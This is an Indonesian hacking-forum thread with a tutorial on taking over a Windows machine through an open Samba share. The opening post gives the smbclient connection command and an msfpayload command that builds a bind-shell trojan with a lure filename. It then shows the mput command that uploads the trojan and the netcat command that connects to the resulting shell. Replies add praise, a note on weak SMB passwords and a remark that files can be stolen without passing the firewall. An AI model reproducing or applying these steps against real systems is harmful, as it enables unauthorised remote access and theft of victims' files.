Exploit Samba PART II "Trojan Uploaded"
#1
Dalam postingan sebelumnya http://indonesianbacktrack.or.id/forum/thread-5212.html
Saya sudah membahas bagaimana attacker dapat masuk ke directory korbannya melalui folder shared kemudian menjadikan smbclient sebagai perantara antara attacker dan clientnya dengan memanfaatkan port 445.

Namun dalam postingan kali saya saya akan membahas bagaimana si penyerang dapat memiliki hak akses penuh layaknya seorang admin yg dapat melakukan banyak hal dalam sistem operasi tersebut.

Equipments:
1. Smbclient
2. Metasploit
3. Netcat


melakukan koneksi ke host korban.
Code:
# smbclient //targetIP/Shared\ Folder -U ComputerName -p port [445]
Spoiler! :

[Image: 1.png]


terlihat diatas korban memiliki 2 buah file dan satu buah folder.

tahap selanjutnya pembuatan payload yang nantinya akan di upload ke host korban.
Code:
#msfpayload windows/shell_bind_tcp LHOST=myIP LPORT=portListening X > Desktop/Cantik.exe
Spoiler! :

[Image: 3.png]


selanjutnya mengupload payload kedalam host korban menggunakan perintah "mput"
Code:
smb: \> mput Payload.exe
Spoiler! :

[Image: 5.png]


Done, upload success =)

selanjutnya apa yg terjadi jika payload tersebut di eksekusi korban..???

Overview.
menggunakan Netcat untuk terhubung dengan host korban di port 4444
Code:
# nc targetIP port [4444]
Spoiler! :

[Image: 6.png]


Spoiler! :

[Image: 8.png]


itulasan mengapa saya memilih pembuatan payload Bind Tcp, saat korban mengeksekusi file tanpa di sadari korban membuka jalan bagi attacker di port yg telah di tentukan. dengan begitu attacker dapat bebas keluar masuk ke host korban Smile

source
Code:
Username :   [ Hidemichi-Hiroyuki]

Password :   [     ********      ]

#2
arghhhhhhhhhhhhhhhhhh maenanmu itu slalu mengerikan.. . >_< haruskah kulkasnya terus penuh.. :v cek"... , nice thread bro... semangat"..

#3
(12-03-2013, 07:28 PM)cyberly Wrote: arghhhhhhhhhhhhhhhhhh maenanmu itu slalu mengerikan.. . >_< haruskah kulkasnya terus penuh.. :v cek"... , nice thread bro... semangat"..

makasih bg Wink :*
Code:
Username :   [ Hidemichi-Hiroyuki]

Password :   [     ********      ]

#4
Yup ini suatu peringatan klo smb di password ya harus kasi yang susah2 jgn mudah di tebak hhehehe nice share bro ... +2
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#5
(12-08-2013, 06:31 AM)zee eichel Wrote: Yup ini suatu peringatan klo smb di password ya harus kasi yang susah2 jgn mudah di tebak hhehehe nice share bro ... +2

sangat di sayangkan kebanyakan user terlalu menganggap sepele bahkan lebih memilih untuk tidak menggunakan password :/.
thanks mas zee Smile
Code:
Username :   [ Hidemichi-Hiroyuki]

Password :   [     ********      ]

#6
kayanya soceng nih yah bro. cocok buat orang yang suka cantik.cantik Big Grin

ane punya kritik bro Big Grin

kebanyakan standar windows tuh firewallnya aktif. seharusnya kalo program dijalanin, otomatis firewall akan mendeteksi perilaku mencurigakan karena buka in port 4444. kayanya kurang cocok kalo penggunanya terlalu gaptek. hehe

#7
(12-09-2013, 09:53 AM)alkaaf Wrote: kayanya soceng nih yah bro. cocok buat orang yang suka cantik.cantik Big Grin

ane punya kritik bro Big Grin

kebanyakan standar windows tuh firewallnya aktif. seharusnya kalo program dijalanin, otomatis firewall akan mendeteksi perilaku mencurigakan karena buka in port 4444. kayanya kurang cocok kalo penggunanya terlalu gaptek. hehe

iya bener sih bro, tapi kalo hanya menggunakan smbclient buat connect ke host korban itu gak perlu melewati firewallnya. lumayan kalo ada file2 penting di dalam folder bisa di ambil =))

thanks masukkannya bro Smile
Code:
Username :   [ Hidemichi-Hiroyuki]

Password :   [     ********      ]






Users browsing this thread: 1 Guest(s)